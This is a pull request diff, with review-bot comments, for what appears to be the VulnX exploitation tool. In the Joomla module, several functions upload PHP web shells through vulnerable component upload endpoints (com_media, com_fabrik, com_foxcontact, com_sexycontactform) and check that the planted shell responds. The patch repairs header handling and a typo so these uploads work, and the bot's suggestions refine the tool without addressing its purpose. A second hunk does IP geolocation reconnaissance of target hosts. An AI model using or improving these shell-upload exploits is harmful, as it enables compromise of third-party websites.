Fix: issues #100 #85 and deleted domain age api #110

Open
wants to merge 1 commit into
base: master
12 changes: 6 additions & 6 deletions modules/exploits/joomla_exploits.py
@@ -45,7 +45,7 @@ def com_jce(self):
def com_media(self):
self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = self.url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'Filedata[]'
shell = open('shell/VulnX.txt','rb')
data = {
@@ -101,7 +101,7 @@ def com_media(self):
#def com_jdownloadsb(self):
# self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
# endpoint = self.url+"/images/jdownloads/screenshots/VulnX.php"
# self.headers={"content-type":["form-data"]}
# self.headers['Content-Type']="form-data"
# files = open('shell/VulnX.zip','rb')
# shell = open('shell/VulnX.gif','rb')
# data = {
@@ -131,7 +131,7 @@ def com_fabrika(self):
self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'file'
shell = open('shell/VulnX.php','rb')
data = {
@@ -158,7 +158,7 @@ def com_fabrikb(self):
self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'file'
shell = open('shell/VulnX.txt','rb')
data = {
@@ -189,7 +189,7 @@ def com_foxcontact(self):
# 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'file'
shell = open('shell/VulnX.txt','rb')
data = {
@@ -353,7 +353,7 @@ def com_sexycontactform(self):
fieldname = "image[]"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files }
requests.post(endpoint, data=data, heades=self.headers,verify=False).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
shellup = self.url + "/com_sexycontactform/fileupload/files/files/VulnX.php?Vuln=X"
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
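Review bot: The new `self.headers['Content-Type']="form-data"` in `com_media` is not equivalent to the line it replaces (reading the first line of each printed pair as the removed one), and nothing in the code or the PR title records the difference. The old statement rebound `self.headers` to a fresh dict, which discarded the `User-Agent` assigned on the line above; the new one mutates the instance's dict in place, so both values remain on `self.headers` after the method returns and are seen by whatever runs next on the same object. The same edit is repeated in `com_fabrika`, `com_fabrikb`, `com_foxcontact` and the commented-out `com_jdownloadsb`. I would add a comment at the first occurrence such as `# mutates the shared self.headers in place; the value persists for later calls on this instance`. All of these method bodies start or continue outside the visible hunks, so how `self.headers` is used afterwards cannot be checked from here.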
30 changes: 12 additions & 18 deletions modules/gathering/host_gathering.py
@@ -37,24 +37,18 @@ def os_server(self):
print(' {0} Cannot Find the server headers ' .format(bad))

def web_host(self):
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(self.url)
getinfo = requests.get(urldate, self.headers,verify=False).text
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date, getinfo)
try:
if matches:
print(' {0} Domain Created on : {1}'.format(good, matches.group(1)))
ip = socket.gethostbyname(hostd(self.url))
print(' {0} CloudFlare IP : {1}'.format(good, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
gather = requests.get(ipinfo, self.headers).text

self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather))
self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather))
self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather))
self.match_printer('Postal',self.match_info(r'postal\": \"(.+?)\"',gather))
self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather))
self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather))
ip = socket.gethostbyname(hostd(self.url))
print(' {0} CloudFlare IP : {1}'.format(good, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
gather = requests.get(ipinfo, self.headers).text

self.match_printer('Hostname',self.match_info(r'hostname\": \"(.+?)\"',gather))
self.match_printer('City',self.match_info(r'city\": \"(.+?)\"',gather))
self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather))
self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather))
self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather))
self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather))
self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather))
except Exception as err:
print(' {0} Parse Error : {1}' .format(bad,err))
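Review bot: `requests.get(ipinfo, self.headers)` in the new `web_host` body passes the header dict as the second positional argument, which `requests.get` treats as `params`, so the header values are serialized into the query string sent to ipinfo.io instead of being applied as request headers. The URL is also plain `http://`, so the looked-up address and those values travel unencrypted. I would change the two lines to `ipinfo = "https://ipinfo.io/" + ip + "/json"` and `gather = requests.get(ipinfo, headers=self.headers).text`. Separately, the `CloudFlare IP` label is printed for whatever `socket.gethostbyname` returns; nothing visible in this hunk checks that the address belongs to Cloudflare, so the output can mislead.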